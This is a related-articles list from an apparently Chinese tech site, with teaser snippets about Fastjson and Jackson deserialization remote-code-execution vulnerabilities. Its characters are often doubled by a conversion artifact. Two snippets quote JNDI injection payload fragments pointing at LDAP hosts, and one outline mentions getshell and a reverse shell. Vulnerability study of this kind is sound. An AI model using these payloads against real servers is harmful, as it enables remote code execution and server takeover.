相關(guān)文章

• 

  fastjson反序列化漏洞學(xué)習(xí)(一)

  Fastjson 是阿里巴巴開(kāi)源的一個(gè) Java 的 JSON 解析庫(kù)。它提供了快速、高效、簡(jiǎn)潔的 JSON 解析功能。Fastjson 不僅支持常見(jiàn)的 JSON 數(shù)據(jù)類(lèi)型（如字符串、數(shù)字、布爾值、數(shù)組、對(duì)象等），還支持 Java 原生數(shù)據(jù)類(lèi)型（如整型、浮點(diǎn)型、數(shù)組、集合等）與 JSON 之間的互相轉(zhuǎn)換。Fastjson 支

  2024年02月04日

  瀏覽(23)
• 

  FastJson序列化導(dǎo)致的 “$ref“

  前言： 剛轉(zhuǎn)后端沒(méi)多久，在通過(guò) RPC 調(diào)用其他組的服務(wù)的時(shí)候，其他組對(duì)接的同學(xué)說(shuō)，你的入?yún)⑹怯袉?wèn)題的，然后他把入?yún)l(fā)我，類(lèi)似于下面的 json ： 這個(gè)對(duì)象包含一個(gè) addressMO 和 brotherMO 以及 name 和 age ， brotherMO 中也包含了 addressMO ，就會(huì)導(dǎo)致 出現(xiàn)上面的 \\\"$ref\\\": \\\"$.addressMO

  2024年02月02日

  瀏覽(22)
• 

  Fastjson反序列化漏洞復(fù)現(xiàn)小結(jié)

  簡(jiǎn)單來(lái)說(shuō)：Fastjson是解析JSON格式的字符串的，允許用戶在輸入JSON串時(shí)通過(guò)“@type”鍵對(duì)應(yīng)的value指定任意反序列化類(lèi)名，進(jìn)而執(zhí)行類(lèi)里的惡意代碼。 1、Fastjson1.2.24遠(yuǎn)程代碼執(zhí)行（CNVD-2017-02833 ） 2、Fastjson=1.2.47遠(yuǎn)程代碼執(zhí)行漏洞（CNVD-2019-22238） 3、Fstjson =1.2.60 遠(yuǎn)程代碼執(zhí)行漏洞

  2023年04月08日

  瀏覽(25)
• 

  FastJson中AutoType反序列化漏洞

  Fastjson1.2.80 反序列化漏洞情報(bào)，攻擊者可以利用該漏洞攻擊遠(yuǎn)程服務(wù)器, 可能會(huì)造成任意命令執(zhí)行。在Fastjson=1.2.83的版本中，通過(guò)新的Gadgets鏈繞過(guò)autoType開(kāi)關(guān)，在autoType關(guān)閉的情況下仍然可能可以繞過(guò)黑白名單防御機(jī)制，實(shí)現(xiàn)了反序列化漏洞利用的遠(yuǎn)程代碼執(zhí)行效果，同時(shí)，此

  2024年02月07日

  瀏覽(18)
• 

  Fastjson反序列化遠(yuǎn)程代碼執(zhí)行漏洞

  據(jù)國(guó)家網(wǎng)絡(luò)與信息安全信息通報(bào)中心監(jiān)測(cè)發(fā)現(xiàn)，開(kāi)源Java開(kāi)發(fā)組件Fastjson存在反序列化遠(yuǎn)程代碼執(zhí)行漏洞。攻擊者可利用上述漏洞實(shí)施任意文件寫(xiě)入、服務(wù)端請(qǐng)求偽造等攻擊行為，造成服務(wù)器權(quán)限被竊取、敏感信息泄漏等嚴(yán)重影響。 先貼一個(gè)解決漏洞的方案： 不過(guò)任何升級(jí)一

  2024年02月09日

  瀏覽(20)

• Fastjson反序列化漏洞原理與復(fù)現(xiàn)

  Fastjson是java的一個(gè)庫(kù)，可以將Java對(duì)象轉(zhuǎn)化為json格式的字符串，也可以將json格式的字符串轉(zhuǎn)化為Java對(duì)象。 Fastjson提供了 toJSONString() 和 parseObject() 方法來(lái)將Java對(duì)象與JSON相互轉(zhuǎn)換。調(diào)用 toJSONString() 方法即可將對(duì)象轉(zhuǎn)換成 JSON 字符串， parseObject() 方法則反過(guò)來(lái)將JSON字符串轉(zhuǎn)換成

  2024年02月12日

  瀏覽(39)
• 

  滲透測(cè)試-Fastjson反序列化漏洞getshell

  目錄 前言 測(cè)試環(huán)境準(zhǔn)備 dnslog測(cè)試 搭建rmi服務(wù)器準(zhǔn)備惡意類(lèi) 引用JdbcRowSetImpl攻擊 反彈shell$命令執(zhí)行 總結(jié) ：fastjson 1.2.24反序列化導(dǎo)致任意命令執(zhí)行漏洞 注：本次滲透測(cè)試全在虛擬機(jī)中進(jìn)行僅用于學(xué)習(xí)交流，請(qǐng)勿在實(shí)際網(wǎng)絡(luò)中攻擊他人服務(wù)器。 前言 ????????最原始

  2024年02月07日

  瀏覽(31)

• Jackson--FastJson--XStream--代碼執(zhí)行&&反序列化

  2.0.0 = FasterXML jackson-databind Version = 2.9.10.2 不受影響版本 FasterXML jackson-databind = 2.8.11.5 FasterXML jackson-databind = 2.9.10.3 POC： String json = \\\"[\\\"org.apache.xbean.propertyeditor.JndiConverter\\\", {\\\"asText\\\":\\\"ldap://localhost:1389/Exploit\\\"}]\\\"; FasterXML jackson-databind 2.x 2.9.10.8 POC String payload = \\\"[\\\"com.oracle.wls.shaded.org.apa

  2024年02月08日

  瀏覽(59)
• 

  fastjson 1.2.24 反序列化漏洞（審計(jì)分析）

  環(huán)境 JDK 8u181 Fastjson 1.2.24 POC 跟進(jìn) parse 方法 跟進(jìn)到底層deserialze 方法 Poc 中傳入的 dataSourceName : ldap://192.168.3.229:8084/vnSYPYwMs 值 這里實(shí)際對(duì)應(yīng) setDataSourceName 方法，調(diào)用此方法并傳入 ldap 跟進(jìn) setDataSourceName 方法，這里只是簡(jiǎn)單賦值 ? 步出回此方法 繼續(xù)步出，進(jìn)入parseRest方法 跟進(jìn)

  2023年04月14日

  瀏覽(37)
• 

  Fastjson反序列化漏洞(1.2.24 RCE)

  目錄 （一）Fastjson介紹 1、認(rèn)識(shí)Fastjson 1.1?序列化 1.2??反序列化 1.3?@type 自省 Autotype （二）漏洞原理 1、比較常用的攻擊類(lèi) 1.1??com.sun.rowset.JdbcRowSetImpl 1.2?com.sun.org.apache.xalan.internal.xsltc.trax. TemplatesImp （三）1.2.24 RCE復(fù)現(xiàn) 1、vulnhub啟動(dòng) 注意：Linux配置JRE版本 2、攻擊機(jī)監(jiān)聽(tīng)（

  2024年02月07日

  瀏覽(32)